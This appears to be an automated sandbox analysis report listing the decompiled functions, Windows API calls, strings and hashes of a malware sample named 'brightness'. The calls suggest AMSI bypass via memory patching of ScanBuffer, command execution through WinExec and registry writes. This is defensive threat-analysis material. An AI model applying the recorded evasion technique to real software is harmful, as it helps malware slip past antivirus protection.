LoadLibraryW.KERNEL32(amsi), ref: 0290878D

Part of subcall function 02908140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029081C8,?,?,00000000,00000000,?,029080E1,00000000,KernelBASE,00000000,00000000,02908108), ref: 0290818D
Part of subcall function 02908140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908193
Part of subcall function 02908140: GetProcAddress.KERNEL32(?,?), ref: 029081A5

Part of subcall function 02907D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 029087EC

Strings

amsi, xrefs: 02908788
W, xrefs: 02908799
DllGetClassObject, xrefs: 029087B2

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: ce6e2ce69fe072e969aebef8ce8a33473c78d9c10c2d29cd29013a794a53e504
Instruction ID: 42c6fbd0db402646229f04b2ae3629069e751bf2d5e201f3cab3257423982394
Opcode Fuzzy Hash: ce6e2ce69fe072e969aebef8ce8a33473c78d9c10c2d29cd29013a794a53e504
Instruction Fuzzy Hash: 45F0445054C3857DD301E3B98C85F4BBFCD5F92234F048A59B2E89A2D2D679D1448B77

Function 028F1A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,028F1FE4), ref: 028F1B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,028F1FE4), ref: 028F1B31

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c28cbc204632509691e420ceab4343b89db93c521d08d01fd257c17546f6d6d1
Instruction ID: 644d79f1c042ddd595e15297ad4cf6bab3f126c7cd927de899db241791c1e57b
Opcode Fuzzy Hash: c28cbc204632509691e420ceab4343b89db93c521d08d01fd257c17546f6d6d1
Instruction Fuzzy Hash: 8E51EF7D605240CFD795CF6CC988B66BBD0AB45328F1885AED64CCB382E774C445CBA1

Function 0290E7AA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0290E8EA

Strings

ScanBuffer, xrefs: 0290E833
Initialize, xrefs: 0290E7DA
OpenSession, xrefs: 0290E88C

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: a0e80a25603392b6f89f227b4db448ab0641d11b82918a5c931bd9c249e104f0
Instruction ID: eb079c670eee1167f5b63f199f21283d07931d4a381085e70a5016319bb84ecf
Opcode Fuzzy Hash: a0e80a25603392b6f89f227b4db448ab0641d11b82918a5c931bd9c249e104f0
Instruction Fuzzy Hash: 0A41033DF1010D9FEB40EBA8D880A9FB3FAEF88700F504866E651E7291DA75AD018F51

Function 0290889C Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,02908983), ref: 029088D0
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908983), ref: 029088E0
GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029088F9

Part of subcall function 02907D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC

FreeLibrary.KERNEL32(74AE0000,00000000,0294B388,Function_0000662C,00000004,0294B398,0294B388,000186A3,00000040,0294B39C,74AE0000,00000000,00000000,00000000,00000000,02908983), ref: 02908963

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
String ID:
API String ID: 1543721669-0
Opcode ID: 01e99e442185ef1b878cfa90ec764cebb137be913f3665ef5dc41528465a4844
Instruction ID: 3e4184e2a1b920a77ee3e2f5f988a0f430ab32f1e350b6d82dc561de723c25de
Opcode Fuzzy Hash: 01e99e442185ef1b878cfa90ec764cebb137be913f3665ef5dc41528465a4844
Instruction Fuzzy Hash: BA11307CF41308AFEB80FBADD851E5E77E9AB84708F5004216714E7691EA74E9008B1A

Function 02908486 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 02908098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908108,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 029080D6
Part of subcall function 02908098: GetModuleHandleA.KERNELBASE(?), ref: 029080EA

Part of subcall function 02908140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029081C8,?,?,00000000,00000000,?,029080E1,00000000,KernelBASE,00000000,00000000,02908108), ref: 0290818D
Part of subcall function 02908140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908193
Part of subcall function 02908140: GetProcAddress.KERNEL32(?,?), ref: 029081A5

WinExec.KERNEL32(?,?), ref: 029084F0

Strings

Kernel32, xrefs: 029084D3
WinExec, xrefs: 029084A1

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: f7e3a8f67f4bcb98a031d4dcb4678c69ffe396c5918c2099a93fb9f94764244e
Instruction ID: dc5c126a1281263a6bc4b682a7bf55e2cfccbe2bbb529cab0ba7875d48c10e66
Opcode Fuzzy Hash: f7e3a8f67f4bcb98a031d4dcb4678c69ffe396c5918c2099a93fb9f94764244e
Instruction Fuzzy Hash: 64016D78B44308BFE750EAA9DC91F6E77EEFB89B04F908461B600D2680D674ED108A25

Function 02908488 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02908098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908108,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 029080D6
Part of subcall function 02908098: GetModuleHandleA.KERNELBASE(?), ref: 029080EA

Part of subcall function 02908140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029081C8,?,?,00000000,00000000,?,029080E1,00000000,KernelBASE,00000000,00000000,02908108), ref: 0290818D
Part of subcall function 02908140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908193
Part of subcall function 02908140: GetProcAddress.KERNEL32(?,?), ref: 029081A5

WinExec.KERNEL32(?,?), ref: 029084F0

Strings

Kernel32, xrefs: 029084D3
WinExec, xrefs: 029084A1

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 6051af0b6f638a5c61c758030f0b7b70640e0873d2f7cc8e7977d8ccbc04401d
Instruction ID: 64ca6ed73fd7cf7556d7b026d76196c23ced048cb52b9c9b937c19f82fc51db4
Opcode Fuzzy Hash: 6051af0b6f638a5c61c758030f0b7b70640e0873d2f7cc8e7977d8ccbc04401d
Instruction Fuzzy Hash: C6F06D78B44308AFE750EAA9DC91F5E77EEFB89B04F908461B600D2680D674A9108A25

Function 02905C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02905D74,?,?,02903900,00000001), ref: 02905C88
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02905D74,?,?,02903900,00000001), ref: 02905CB6

Part of subcall function 028F7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02903900,02905CF6,00000000,02905D74,?,?,02903900), ref: 028F7DAA

Part of subcall function 028F7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02903900,02905D11,00000000,02905D74,?,?,02903900,00000001), ref: 028F7FB7

GetLastError.KERNEL32(00000000,02905D74,?,?,02903900,00000001), ref: 02905D1B

Part of subcall function 028FA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,028FC3D9,00000000,028FC433), ref: 028FA797

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: 7837513618308a6a9e9e478fd6b201302e34dd95395f0e21c09b0ad96e378277
Instruction ID: da6f91e942c40fe8741f10ec352c2ec1a43e135ec7f168f5794f4d645521f769
Opcode Fuzzy Hash: 7837513618308a6a9e9e478fd6b201302e34dd95395f0e21c09b0ad96e378277
Instruction Fuzzy Hash: 25317378A006099FDB40EFA8C881BAEB7F6AF48710F918565D604EB390E7755D048FA2

Function 0290F506 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02A3FA64), ref: 0290F54C
RegSetValueExA.ADVAPI32(000008D8,00000000,00000000,00000001,00000000,0000001C,00000000,0290F5B7), ref: 0290F584
RegCloseKey.ADVAPI32(000008D8,000008D8,00000000,00000000,00000001,00000000,0000001C,00000000,0290F5B7), ref: 0290F58F

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: b2a375890a2101088475670030c3001b940dca1a3c71d72442375fb74b8c1a3f
Instruction ID: fb80ebcb54ac3d579800f3e28ed9ebc64ba7ff6e4e9740995368847644dd28d6
Opcode Fuzzy Hash: b2a375890a2101088475670030c3001b940dca1a3c71d72442375fb74b8c1a3f
Instruction Fuzzy Hash: 7F11E979B50208AFEB90EF6CDC81D9E77ADEB08700B404461FA14D7A60DA30EA418A55

Function 0290F508 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02A3FA64), ref: 0290F54C
RegSetValueExA.ADVAPI32(000008D8,00000000,00000000,00000001,00000000,0000001C,00000000,0290F5B7), ref: 0290F584
RegCloseKey.ADVAPI32(000008D8,000008D8,00000000,00000000,00000001,00000000,0000001C,00000000,0290F5B7), ref: 0290F58F

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 6ec853a241d287491fbeaa503c5bf3d5a579b19ec1728928efba141eded6ef29
Instruction ID: 5cc38e20b5d536c2cf37197a481fc8843140534c2f0be91a98fc7167dcc0f1f3
Opcode Fuzzy Hash: 6ec853a241d287491fbeaa503c5bf3d5a579b19ec1728928efba141eded6ef29
Instruction Fuzzy Hash: EF11E979B50208AFEB90EF68DC81D9E77ADEB08700B404461FA14D7A60DA30EA418A55

Function 028FE364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 028FE373

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 19c35f62e9d9afcb254fa619e04b42bc701b0bf70caf470efdc34d476d7202ce
Instruction ID: 91af579f86bed0d0cf67ee7b6209f32fe1bd9b59d0b978f95d4fb15c960c7dec
Opcode Fuzzy Hash: 19c35f62e9d9afcb254fa619e04b42bc701b0bf70caf470efdc34d476d7202ce
Instruction Fuzzy Hash: FEF0AF2D708118CB8BA0BF3D888C66E279A5F407447081436A74ADB171DB64DC45C763

Function 028F4D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(0290F798), ref: 028F4C6E
SysAllocStringLen.OLEAUT32(?,?), ref: 028F4D5B
SysFreeString.OLEAUT32(00000000), ref: 028F4D6D

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction ID: 15d78c39510a66dea185769363c708af75a73d048fc189bbd7025b9ff6c4c3b1
Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction Fuzzy Hash: 07E02BBC2012059EFFC4AF21CC44B37332AAFC1741B24809AEB08CE014E739D440AD38

Function 029070DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 029073DA

Strings

H, xrefs: 02907191

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 835a66c32d94b433c76acf8287b933cb0898f6967304c7c1ccc70149d2160ed1
Instruction ID: e23b4eede57afa36ad5409215eb90b81f2314a8576b5317dcb137196c76b6182
Opcode Fuzzy Hash: 835a66c32d94b433c76acf8287b933cb0898f6967304c7c1ccc70149d2160ed1
Instruction Fuzzy Hash: 0EB1B178A016089FDB15CF99E4C0A9DFBF6FF89324F248569E945AB3A0D730A845CF50

Function 028FE760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 028FE781

Part of subcall function 028FE364: VariantClear.OLEAUT32(?), ref: 028FE373

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 68de25cf484d6cdbc0426d8e012b8c59d6c443e929d2ee6498c4ba574c941ab3
Instruction ID: 046f8b9275456d69125cfe602b8179a6e973a4373c7011d4330ca3840aa29bbd
Opcode Fuzzy Hash: 68de25cf484d6cdbc0426d8e012b8c59d6c443e929d2ee6498c4ba574c941ab3
Instruction Fuzzy Hash: D111702C7102148BC7B0AF2DC8C4A6A67DAAF847507108426E74ACB675DB30DC45CA62

Function 028FE3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 028FE43C

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: a5daf04159e88b620f99bae42a974007e24087f0c01ec236158be67f98a0313b
Instruction ID: 3945cf668cb64561d3f34217f074528368aa306314d3738a55e5e1b073e53e18
Opcode Fuzzy Hash: a5daf04159e88b620f99bae42a974007e24087f0c01ec236158be67f98a0313b
Instruction Fuzzy Hash: 2431447DA005089FDB90DFACD884AAE77E9EB1C314F448569FB09D3260D734D950CBA6

Function 02906D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02906DB9,?,?,?,00000000), ref: 02906D99

Part of subcall function 028F4C60: SysFreeString.OLEAUT32(0290F798), ref: 028F4C6E

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 8143f5a779a5fa5c08896ee544cff83bdf67b522d9ceeef0035c5efb1caedf99
Instruction ID: f10e25d9ae2363a2a167edf03fe7f84f8c367d0aeca2d4e92bf34b31a1804805
Opcode Fuzzy Hash: 8143f5a779a5fa5c08896ee544cff83bdf67b522d9ceeef0035c5efb1caedf99
Instruction Fuzzy Hash: 0DE0A03E20020CAFE311FA6A9C9194E77ADDF8A710B5104B2A600D2580DA316E108861

Function 028F5868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028F5886

Part of subcall function 028F5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,028F0000,0291E790), ref: 028F5AE8
Part of subcall function 028F5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5B06
Part of subcall function 028F5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5B24
Part of subcall function 028F5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028F5B42
Part of subcall function 028F5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028F5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028F5B8B
Part of subcall function 028F5ACC: RegQueryValueExA.ADVAPI32(?,028F5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028F5BD1,?,80000001), ref: 028F5BA9
Part of subcall function 028F5ACC: RegCloseKey.ADVAPI32(?,028F5BD8,00000000,?,?,00000000,028F5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028F5BCB

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction ID: c294ad992d8bd94d6c3c5f31d913b98d7560a9cb41abc76013909b75c2e70d18
Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction Fuzzy Hash: 61E06D79A003149FCB50DE9CC8C4B4733D8AB08750F440961EE58CF346D7B4D9608BD1

Function 028F7DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 028F7DF4

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

